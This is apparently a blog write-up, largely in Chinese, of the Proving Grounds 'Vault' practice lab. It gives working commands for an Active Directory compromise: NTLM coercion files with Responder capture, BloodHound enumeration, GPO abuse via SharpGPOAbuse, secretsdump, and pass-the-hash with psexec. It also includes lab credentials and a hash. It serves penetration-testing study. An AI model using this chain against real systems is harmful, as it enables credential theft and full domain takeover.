Proving Grounds Vault Writeup
Proving Grounds Vault
Recon:
1 | nmap 192.168.183.172 -p- --min-rate 2000 -Pn -sT |
1 | nmap 192.168.183.172 -p53,88,135,139,389,445,464,593,636,3268,3269,3389,9389 -sC -sV -Pn |
查看SMB共享:
1 | smbmap -H 192.168.183.172 -u guest |
使用hashgrab生成NTLM强制认证文件:
1 | python hashgrab.py 192.168.45.222 test |
访问SMB放入文件:
Responder可以捕获到响应:
破解password:
枚举Bloodhound:
1 | bloodhound-python -c all -u anirudh -p SecureHM -d vault.offsec -ns 192.168.183.172 --zip |
上传Bloodhound:
用户 ANIRUDH@VAULT.OFFSEC 有权修改 GPO DEFAULT DOMAIN POLICY@VAULT.OFFSEC 上的 DACL(自由访问控制列表).此功能允许攻击者执行各种攻击,他们可以通过计划任务执行命令、禁用或修改系统服务、提升权限等等,目标是开放着5985的,但是Nmap并未扫描出来,通过5985登录到目标机器中:
1 | evil-winrm -i 192.168.183.172 -u anirudh -p SecureHM |
上传:
1 | https://github.com/byronkg/SharpGPOAbuse/releases/tag/1.0 |
将用户添加到本地管理员中:
1 | .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "DEFAULT DOMAIN POLICY" |
dump administrator hash:
1 | secretsdump.py "vault.offsec/anirudh:SecureHM@192.168.183.172" |
1 | psexec.py "vault.offsec/administrator@192.168.183.172" -hashes :54ff9c380cf1a80c23467ff51919146e |
All articles on this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.
wechat
alipay
Related Articles
2024-07-26
Proving Grounds Access Writeup
Recon:对端口进行扫描探测: 1nmap 192.168.203.187 -p- -Pn -n -sT --min-rate 2000 1nmap 192.168.203.187 -sC -sV -p 53,80,88,135,139,389,445,464,593,636,3268 -Pn 根据扫描结果来看,目标域名为access.offsec。 GetFlag:搜集目录信息,发现有趣的URL: 1dirsearch -u http://access.offsec/ 1234http://access.offsec/cgi-bin/printenv.plhttp://access.offsec/uploads/http://access.offsec/assets/http://access.offsec/forms/ 获取到站点绝对路径: 点击网页的Buy...
2024-12-24
Proving Grounds Clue Writeup
Proving Grounds - ClueRecon GetShell打开3000端口: 右上角是一个CQL查询的接口,页面显示版本号为3.11.13,搜索漏洞: 这个版本号不一定是Cassandra的版本号,有可能是那个集群id的版本,所以exploit DB中的文件读取poc可以尝试一下: 目标机器上存在两个用户,cassie与anthony。根据漏洞脚本的提示: 读取/proc/self/cmdline: 没什么效果。搜素8021上的服务指纹,找到一个命令注入: 但是他需要密码: 所以大概思路就是,利用文件读取漏洞却尝试读取密码,最后发现密码文件在: 对RCE利用脚本进行更改: 反弹shell: 发现3000端口才能出站。升级交互式shell: 发现用户ssh密钥: 可以用文件读取漏洞去获取: 这是root用户的密钥:
2024-07-26
Proving Grounds Slort Writeup
Recon:1nmap 192.168.196.53 -p- -Pn --min-rate 2000 -sT -n ![image-20240706195058310]https://anneballa.github.io/pageimgs/oldimage/image-20240706195058310.png) 1nmap 192.168.196.53 -p21,135,139,445,3306,4443,5040,7680,8080 -sC -sV ![image-20240706200131088]https://anneballa.github.io/pageimgs/oldimage/image-20240706200131088.png) GetFlag:枚举目录: 1dirsearch -u...
Comments
